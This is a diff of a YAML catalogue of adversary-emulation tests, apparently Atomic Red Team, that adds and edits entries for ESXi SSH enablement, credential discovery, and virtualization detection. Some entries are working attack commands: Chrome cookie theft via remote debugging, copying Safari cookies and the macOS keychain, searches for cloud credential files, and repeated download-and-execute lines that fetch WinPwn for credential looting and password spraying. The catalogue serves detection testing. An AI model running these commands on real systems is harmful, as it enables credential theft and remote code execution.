-          zipfile import ZipFile; ZipFile('#{path_to_output_file}', mode='w').write('#{path_to_input_file}')\"
-          \n"
+        command: "which_python=`which python || which python3`\n$which_python -c \"import
+          tarfile; output_file = tarfile.open('#{path_to_output_file}','w'); output_file.add('#{path_to_input_file}');
+          output_file.close()\" \n"
         cleanup_command: 'rm #{path_to_output_file}
 
           '
@@ -84296,11 +84922,11 @@ collection:
         username:
           description: office-365 username
           type: string
-          default: 
+          default:
         password:
           description: office-365 password
           type: string
-          default: 
+          default:
         rule_name:
           description: email rule name
           type: string
@@ -84719,23 +85345,23 @@ collection:
             and Application.ReadWrite.All Scope (eg, Global Administrator Role) and
             sign-in method is password
           type: string
-          default: 
+          default:
         password:
           description: Entra user password
           type: string
-          default: 
+          default:
         1st_target_mailbox:
           description: office-365 target_email_address
           type: string
-          default: 
+          default:
         2nd_target_mailbox:
           description: office-365 target_email_address
           type: string
-          default: 
+          default:
         3rd_target_mailbox:
           description: office-365 target_email_address
           type: string
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'Microsoft Graph PowerShell SDK must be installed.
@@ -85644,7 +86270,7 @@ lateral-movement:
 
         '
       supported_platforms:
-      - linux
+      - windows
       input_arguments:
         vm_host:
           description: Specify the host name of the ESXi Server
@@ -85680,6 +86306,52 @@ lateral-movement:
           | Where-Object {$_.Key -eq \"TSM-SSH\" } | Stop-VMHostService -Confirm:$false\n"
         name: powershell
         elevation_required: true
+    - name: ESXi - Enable SSH via VIM-CMD
+      auto_generated_guid: 280812c8-4dae-43e9-a74e-1d08ab997c0e
+      description: |
+        An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface.
+        [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
+      supported_platforms:
+      - windows
+      input_arguments:
+        vm_host:
+          description: Specify the host name or IP of the ESXi server.
+          type: string
+          default: atomic.local
+        vm_user:
+          description: Specify the privilege user account on the ESXi server.
+          type: string
+          default: root
+        vm_pass:
+          description: Specify the privileged user's password.
+          type: string
+          default: password
+        plink_file:
+          description: Path to Plink
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Check if we have plink
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: 'echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user}
+          -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
+
+          '
+        cleanup_command: 'echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user}
+          -pw "#{vm_pass}" "vim-cmd hostsvc/disable_ssh"
+
+          '
+        name: command_prompt
+        elevation_required: false
   T1091:
     technique:
       modified: '2023-10-17T20:42:21.453Z'
@@ -86726,7 +87398,7 @@ lateral-movement:
           description: Ticket file name usually format of 'id-username\@domain.kirbi'
             (e.g. can be dumped by "sekurlsa::tickets /export" module)
           type: string
-          default: 
+          default:
         mimikatz_exe:
           description: Path of the Mimikatz binary
           type: path
@@ -89525,6 +90197,72 @@ credential-access:
         cleanup_command: rm -rf /tmp/WhiteChocolateMacademiaNut
         name: bash
         elevation_required: false
+    - name: Steal Chrome v127+ cookies via Remote Debugging (Windows)
+      auto_generated_guid: b647f4ee-88de-40ac-9419-f17fac9489a7
+      description: |-
+        Chrome v127+ uses app-bound encryption to protect cookies. This test bypasses that protection to obtain the cookies. If successful, the test outputs cookie values to the console.
+        Note: Will stop any instances of Chrome already running
+        Adapted from https://embracethered.com/blog/posts/2024/cookie-theft-in-2024-and-what-todo
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $devToolsPort = 9222
+          $testUrl = "https://www.google.com"
+          stop-process -name "chrome" -force -erroraction silentlycontinue
+          $chromeProcess = Start-Process "chrome.exe" "$testUrl --remote-debugging-port=$devToolsPort --profile-directory=Default" -PassThru
+          Start-Sleep 10
+          $jsonResponse = Invoke-WebRequest "http://localhost:$devToolsPort/json" -UseBasicParsing
+          $devToolsPages = ConvertFrom-Json $jsonResponse.Content
+          $ws_url = $devToolsPages[0].webSocketDebuggerUrl
+          $ws = New-Object System.Net.WebSockets.ClientWebSocket
+          $uri = New-Object System.Uri($ws_url)
+          $ws.ConnectAsync($uri, [System.Threading.CancellationToken]::None).Wait()
+          $GET_ALL_COOKIES_REQUEST = '{"id": 1, "method": "Network.getAllCookies"}'
+          $buffer = [System.Text.Encoding]::UTF8.GetBytes($GET_ALL_COOKIES_REQUEST)
+          $segment = New-Object System.ArraySegment[byte] -ArgumentList $buffer, 0, $buffer.Length
+          $ws.SendAsync($segment, [System.Net.WebSockets.WebSocketMessageType]::Text, $true, [System.Threading.CancellationToken]::None).Wait()
+          $completeMessage = New-Object System.Text.StringBuilder
+          do {
+              $receivedBuffer = New-Object byte[] 2048
+              $receivedSegment = New-Object System.ArraySegment[byte] -ArgumentList $receivedBuffer, 0, $receivedBuffer.Length
+              $result = $ws.ReceiveAsync($receivedSegment, [System.Threading.CancellationToken]::None).Result
+              $receivedString = [System.Text.Encoding]::UTF8.GetString($receivedSegment.Array, $receivedSegment.Offset, $result.Count)
+              $completeMessage.Append($receivedString)
+          } while (-not $result.EndOfMessage)
+          $ws.CloseAsync([System.Net.WebSockets.WebSocketCloseStatus]::NormalClosure, "Closing", [System.Threading.CancellationToken]::None).Wait()
+          try {
+              $response = ConvertFrom-Json $completeMessage.ToString()
+              $cookies = $response.result.cookies
+          } catch {
+              Write-Host "Error parsing JSON data."
+          }
+          Write-Host $cookies
+          Stop-Process $chromeProcess -Force
+        name: powershell
+        elevation_required: false
+    - name: Copy Safari BinaryCookies files using AppleScript
+      auto_generated_guid: e57ba07b-3a33-40cd-a892-748273b9b49a
+      description: 'This command will copy Safari BinaryCookies files using AppleScript
+        as seen in Atomic Stealer.
+
+        '
+      supported_platforms:
+      - macos
+      input_arguments:
+        destination_path:
+          description: Specify the path to copy the BinaryCookies file into.
+          type: path
+          default: "/private/tmp"
+      executor:
+        command: osascript -e 'tell application "Finder"' -e 'set destinationFolderPath
+          to POSIX file "#{destination_path}"' -e 'set safariFolder to ((path to library
+          folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")'
+          -e 'duplicate file "Cookies.binarycookies" of folder safariFolder to folder
+          destinationFolderPath with replacing' -e 'end tell'
+        cleanup_command: rm "#{destination_path}/Cookies.binarycookies"
+        name: sh
+        elevation_required: false
   T1003.002:
     technique:
       modified: '2024-10-15T16:40:52.174Z'
@@ -89765,8 +90503,7 @@ credential-access:
       supported_platforms:
       - windows
       executor:
-        command: "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object
-          net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsamfile
+        command: "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nsamfile
           -consoleoutput -noninteractive  "
         name: powershell
     - name: Dumping of SAM, creds, and secrets(Reg Export)
@@ -89858,7 +90595,7 @@ credential-access:
         username:
           description: Azure AD username
           type: string
-          default: 
+          default:
         password:
           description: Azure AD password
           type: string
@@ -90207,6 +90944,26 @@ credential-access:
           '
         name: sh
         elevation_required: false
+    - name: Copy Keychain using cat utility
+      auto_generated_guid: 5c32102a-c508-49d3-978f-288f8a9f6617
+      description: 'This command will copy the keychain using the cat utility in a
+        manner similar to Atomic Stealer.
+
+        '
+      supported_platforms:
+      - macos
+      input_arguments:
+        keychain_export:
+          description: Specify the path to copy they keychain into.
+          type: path
+          default: "/tmp/keychain"
+      executor:
+        command: 'cat ~/Library/Keychains/login.keychain-db > #{keychain_export}
+
+          '
+        cleanup_command: 'rm #{keychain_export}'
+        name: sh
+        elevation_required: false
   T1003.004:
     technique:
       modified: '2024-08-13T15:49:17.591Z'
@@ -92142,7 +92899,6 @@ credential-access:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           lazagnemodule -consoleoutput -noninteractive
         name: powershell
@@ -92153,8 +92909,7 @@ credential-access:
       supported_platforms:
       - windows
       executor:
-        command: "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object
-          net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nwificreds
+        command: "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nwificreds
           -consoleoutput -noninteractive  "
         name: powershell
     - name: WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords
@@ -92164,8 +92919,7 @@ credential-access:
       supported_platforms:
       - windows
       executor:
-        command: "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object
-          net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ndecryptteamviewer
+        command: "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ndecryptteamviewer
           -consoleoutput -noninteractive  "
         name: powershell
   T1552:
@@ -92620,9 +93374,10 @@ credential-access:
           Expand-Archive "#{file_path}\Modified-SysInternalsSuite.zip" "#{file_path}\sysinternals" -Force
           Remove-Item "#{file_path}\Modified-SysInternalsSuite.zip" -Force
       executor:
-        command: |
-          Set-Location -path "#{file_path}\Sysinternals";
-          ./accesschk.exe -accepteula .;
+        command: 'Start-Process "#{file_path}\Sysinternals\accesschk.exe" -ArgumentList
+          "-accepteula ."
+
+          '
         cleanup_command: 'Remove-Item "#{file_path}\Sysinternals" -Force -Recurse
           -ErrorAction Ignore
 
@@ -93016,7 +93771,6 @@ credential-access:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           browserpwn -consoleoutput -noninteractive
         cleanup_command: rm .\System.Data.SQLite.dll -ErrorAction Ignore
@@ -93029,7 +93783,6 @@ credential-access:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           kittenz -consoleoutput -noninteractive
         name: powershell
@@ -94777,7 +95530,6 @@ credential-access:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           domainpassspray -consoleoutput -noninteractive -emptypasswords
         name: powershell
@@ -95619,7 +96371,7 @@ credential-access:
       identifier: T1552.001
     atomic_tests:
     - name: Find AWS credentials
-      auto_generated_guid: 2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17
+      auto_generated_guid: 37807632-d3da-442e-8c2e-00f44928ff8f
       description: 'Find local AWS credentials from file, defaults to using / as the
         look path.
 
@@ -95633,7 +96385,7 @@ credential-access:
           type: string
           default: "/"
       executor:
-        command: 'find #{file_path} -name "credentials" -type f -path "*/.aws/*" 2>/dev/null
+        command: 'find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
 
           '
         name: sh
@@ -95721,7 +96473,6 @@ credential-access:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           sensitivefiles -noninteractive -consoleoutput
         name: powershell
@@ -95733,7 +96484,6 @@ credential-access:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           Snaffler -noninteractive -consoleoutput
         name: powershell
@@ -95745,7 +96495,6 @@ credential-access:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           powershellsensitive -consoleoutput -noninteractive
         name: powershell
@@ -95756,7 +96505,6 @@ credential-access:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           passhunt -local $true -noninteractive
         cleanup_command: |-
@@ -95775,7 +96523,6 @@ credential-access:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           sessionGopher -noninteractive -consoleoutput
         name: powershell
@@ -95787,8 +96534,7 @@ credential-access:
       supported_platforms:
       - windows
       executor:
-        command: "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object
-          net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nSharpCloud
+        command: "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nSharpCloud
           -consoleoutput -noninteractive  "
         name: powershell
     - name: List Credential Files via PowerShell
@@ -95820,6 +96566,65 @@ credential-access:
           dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
         name: command_prompt
         elevation_required: true
+    - name: Find Azure credentials
+      auto_generated_guid: a8f6148d-478a-4f43-bc62-5efee9f931a4
+      description: 'Find local Azure credentials from file, defaults to using / as
+        the look path.
+
+        '
+      supported_platforms:
+      - macos
+      - linux
+      input_arguments:
+        file_path:
+          description: Path to search
+          type: string
+          default: "/"
+      executor:
+        command: 'find #{file_path}/.azure -name "msal_token_cache.json" -o -name
+          "accessTokens.json" -type f 2>/dev/null
+
+          '
+        name: sh
+    - name: Find GCP credentials
+      auto_generated_guid: aa12eb29-2dbb-414e-8b20-33d34af93543
+      description: 'Find local Google Cloud Platform credentials from file, defaults
+        to using / as the look path.
+
+        '
+      supported_platforms:
+      - macos
+      - linux
+      input_arguments:
+        file_path:
+          description: Path to search
+          type: string
+          default: "/"
+      executor:
+        command: 'find #{file_path}/.config/gcloud -name "credentials.db" -o -name
+          "access_tokens.db" -type f 2>/dev/null
+
+          '
+        name: sh
+    - name: Find OCI credentials
+      auto_generated_guid: 9d9c22c9-fa97-4008-a204-478cf68c40af
+      description: 'Find local Oracle cloud credentials from file, defaults to using
+        / as the look path.
+
+        '
+      supported_platforms:
+      - macos
+      - linux
+      input_arguments:
+        file_path:
+          description: Path to search
+          type: string
+          default: "/"
+      executor:
+        command: 'find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
+
+          '
+        name: sh
   T1606.001:
     technique:
       modified: '2023-09-19T21:25:10.511Z'
@@ -96027,7 +96832,7 @@ credential-access:
         username:
           description: Azure AD username
           type: string
-          default: 
+          default:
         password:
           description: Azure AD password
           type: string
@@ -96039,7 +96844,7 @@ credential-access:
         subscription_id:
           description: Azure subscription id to search
           type: string
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'The Get-AzurePasswords script must exist in PathToAtomicsFolder\..\ExternalPayloads.
@@ -98628,7 +99433,7 @@ credential-access:
           description: command flags you would like to run (optional and blank by
             default)
           type: string
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'Computer must be domain joined
@@ -98756,7 +99561,6 @@ credential-access:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           Kerberoasting -consoleoutput -noninteractive
         name: powershell
@@ -99822,7 +100626,7 @@ discovery:
       executor:
         name: bash
         elevation_required: false
-        command: 'ping -n 4 #{ping_target}
+        command: 'ping -c 4 #{ping_target}
 
           '
     - name: Check internet connection using Test-NetConnection in PowerShell (ICMP-Ping)
@@ -100122,7 +100926,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           GPOAudit -noninteractive -consoleoutput
         name: powershell
@@ -100134,7 +100937,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           GPORemoteAccessPolicy -consoleoutput -noninteractive
         name: powershell
@@ -100255,7 +101057,7 @@ discovery:
         command: |
           driverquery /v /fo list
           driverquery /si /fo list
-        cleanup_command: 
+        cleanup_command:
         name: powershell
         elevation_required: false
   T1087.002:
@@ -100406,7 +101208,7 @@ discovery:
             it to the specific needs of the environment. Use "-arg" notation to add
             arguments separated by spaces.
           type: string
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -100439,7 +101241,7 @@ discovery:
             it to the specific needs of the environment. Use "-arg" notation to add
             arguments separated by spaces.
           type: string
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -100471,7 +101273,7 @@ discovery:
             it to the specific needs of the environment. Use "-arg" notation to add
             arguments separated by spaces.
           type: string
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -100503,7 +101305,7 @@ discovery:
             it to the specific needs of the environment. Use "-arg" notation to add
             arguments separated by spaces.
           type: string
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -100651,7 +101453,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           generaldomaininfo -noninteractive -consoleoutput
         name: powershell
@@ -100728,7 +101529,7 @@ discovery:
           default: "$env:computername"
       executor:
         command: 'Get-ADComputer #{hostname} -Properties *'
-        cleanup_command: 
+        cleanup_command:
         name: powershell
         elevation_required: false
     - name: Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property
@@ -100744,7 +101545,7 @@ discovery:
           default: "$env:computername"
       executor:
         command: 'Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime'
-        cleanup_command: 
+        cleanup_command:
         name: powershell
         elevation_required: false
     - name: Suspicious LAPS Attributes Query with Get-ADComputer all properties and
@@ -100758,7 +101559,7 @@ discovery:
       executor:
         command: Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties
           *
-        cleanup_command: 
+        cleanup_command:
         name: powershell
         elevation_required: false
     - name: Suspicious LAPS Attributes Query with adfind all properties
@@ -100773,7 +101574,7 @@ discovery:
             it to the specific needs of the environment. Use "-arg" notation to add
             arguments separated by spaces.
           type: string
-          default: 
+          default:
         domain:
           description: Domain of the host
           type: string
@@ -100783,7 +101584,7 @@ discovery:
           -h #{domain} -s subtree -f "objectclass=computer" *
 
           '
-        cleanup_command: 
+        cleanup_command:
         name: powershell
         elevation_required: false
     - name: Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd
@@ -100798,7 +101599,7 @@ discovery:
             it to the specific needs of the environment. Use "-arg" notation to add
             arguments separated by spaces.
           type: string
-          default: 
+          default:
         domain:
           description: Domain of the host
           type: string
@@ -100808,7 +101609,7 @@ discovery:
           -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
 
           '
-        cleanup_command: 
+        cleanup_command:
         name: powershell
         elevation_required: false
     - name: Active Directory Domain Search
@@ -101160,6 +101961,48 @@ discovery:
 
           '
         name: command_prompt
+    - name: ESXi - Local Account Discovery via ESXCLI
+      auto_generated_guid: 9762ac6e-aa60-4449-a2f0-cbbd0e1fd22c
+      description: |
+        An adversary can use ESXCLI to enumerate a list of all local accounts on an ESXi host.
+        [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/esxcli/#account%20enumeration)"
+      supported_platforms:
+      - windows
+      input_arguments:
+        vm_host:
+          description: Specify the host name or IP of the ESXi server.
+          type: string
+          default: atomic.local
+        vm_user:
+          description: Specify the privilege user account on the ESXi server.
+          type: string
+          default: root
+        vm_pass:
+          description: Specify the privileged user's password.
+          type: string
+          default: password
+        plink_file:
+          description: Path to Plink
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Check if we have plink
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: 'echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user}
+          -pw "#{vm_pass}" "esxcli system account list"
+
+          '
+        name: command_prompt
+        elevation_required: false
   T1497.001:
     technique:
       modified: '2024-09-12T15:50:18.047Z'
@@ -101307,7 +102150,7 @@ discovery:
           Get-WmiObject -Query "SELECT * FROM MSAcpi_ThermalZoneTemperature" -ErrorAction SilentlyContinue
           if($error) {echo "Virtualization Environment detected"}
         cleanup_command: "$error.clear()\n"
-    - name: Detect Virtualization Environment (MacOS)
+    - name: Detect Virtualization Environment via ioreg
       auto_generated_guid: a960185f-aef6-4547-8350-d1ce16680d09
       description: 'ioreg contains registry entries for all the device drivers in
         the system. If it''s a virtual machine, one of the device manufacturer will
@@ -101339,6 +102182,49 @@ discovery:
           $Manufacturer = Get-WmiObject -Class Win32_ComputerSystem | select-object -expandproperty "Manufacturer"
           $Model = Get-WmiObject -Class Win32_ComputerSystem | select-object -expandproperty "Model"
           if((($Manufacturer.ToLower() -eq "microsoft corporation") -and ($Model.ToLower().contains("virtual"))) -or ($Manufacturer.ToLower().contains("vmware")) -or ($Model.ToLower() -eq "virtualbox")) {write-host "Virtualization environment detected!"} else {write-host "No virtualization environment detected!"}
+    - name: Detect Virtualization Environment using sysctl (hw.model)
+      auto_generated_guid: 6beae646-eb4c-4730-95be-691a4094408c
+      description: |
+        sysctl hw.model will return the model name of the hardware(Macmini8,1, MacBookAir10,1, etc.) in case of native Apple hardware
+        but will return the hypervisor name (VMware7,0).
+        Reference: https://evasions.checkpoint.com/src/MacOS/macos.html#hardware-model
+      supported_platforms:
+      - macos
+      executor:
+        name: sh
+        command: 'if [ "$(sysctl -n hw.model | grep -v ''Mac'')" != "" ]; then echo
+          ''Virtualization Environment detected''; fi;
+
+          '
+    - name: Check if System Integrity Protection is enabled
+      auto_generated_guid: 2b73cd9b-b2fb-4357-b9d7-c73c41d9e945
+      description: "The latest versions of macOS have the System Integrity Protection
+        feature (SIP). If a sandbox uses a non-signed \nkernel extension for monitoring
+        purposes the, SIP feature must be disabled to load this kind of kernel extension.\nMalware
+        may check if the SIP is enabled.\nReference: https://evasions.checkpoint.com/src/MacOS/macos.html#sip\n"
+      supported_platforms:
+      - macos
+      executor:
+        name: sh
+        command: 'if [ "$(csrutil status | grep -v ''enabled'')" != "" ]; then echo
+          ''Possible Virtualization Environment detected''; fi;
+
+          '
+    - name: Detect Virtualization Environment using system_profiler
+      auto_generated_guid: e04d2e89-de15-4d90-92f9-a335c7337f0f
+      description: "system_profiler provides system hardware and software configuration
+        and the Model Identifier should provide the value similar to (sysctl -n hw.model).
+        \nWe should be able to find whether virtualization is enabled by checking
+        whether the Model Identifier does not contain \"Mac\".\n"
+      supported_platforms:
+      - macos
+      executor:
+        name: sh
+        command: 'if [ "$(system_profiler SPHardwareDataType | grep "Model Identifier"
+          | grep -v ''Mac'')" != "" ]; then echo ''Virtualization Environment detected'';
+          fi;
+
+          '
   T1069.002:
     technique:
       modified: '2023-04-07T17:16:47.754Z'
@@ -101528,7 +102414,7 @@ discovery:
             it to the specific needs of the environment. Use "-arg" notation to add
             arguments separated by spaces.
           type: string
-          default: 
+          default:
       dependency_executor_name: powershell
       dependencies:
       - description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -102581,7 +103467,7 @@ discovery:
       auto_generated_guid: 20f1097d-81c1-405c-8380-32174d493bbb
       description: |
         Network Share Discovery utilizing the command prompt. The computer name variable may need to be modified to point to a different host
-        Upon execution avalaible network shares will be displayed in the powershell session
+        Upon execution available network shares will be displayed in the powershell session
       supported_platforms:
       - windows
       input_arguments:
@@ -102598,7 +103484,7 @@ discovery:
       auto_generated_guid: 1b0814d1-bb24-402d-9615-1b20c50733fb
       description: |
         Network Share Discovery utilizing PowerShell. The computer name variable may need to be modified to point to a different host
-        Upon execution, avalaible network shares will be displayed in the powershell session
+        Upon execution, available network shares will be displayed in the powershell session
       supported_platforms:
       - windows
       executor:
@@ -102609,7 +103495,7 @@ discovery:
     - name: View available share drives
       auto_generated_guid: ab39a04f-0c93-4540-9ff2-83f862c385ae
       description: View information about all of the resources that are shared on
-        the local computer Upon execution, avalaible share drives will be displayed
+        the local computer Upon execution, available share drives will be displayed
         in the powershell session
       supported_platforms:
       - windows
@@ -102677,7 +103563,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           shareenumeration -noninteractive -consoleoutput
         name: powershell
@@ -102685,7 +103570,7 @@ discovery:
       auto_generated_guid: 13daa2cf-195a-43df-a8bd-7dd5ffb607b5
       description: |
         Network Share Discovery utilizing the dir command prompt. The computer ip variable may need to be modified to point to a different host ip
-        Upon execution avalaible network shares will be displayed in the commandline session
+        Upon execution available network shares will be displayed in the commandline session
       supported_platforms:
       - windows
       input_arguments:
@@ -102836,7 +103721,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           printercheck -noninteractive -consoleoutput
         name: powershell
@@ -103159,7 +104043,6 @@ discovery:
       - windows
       executor:
         command: |-
-          $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           winPEAS -noninteractive -consoleoutput
         name: powershell
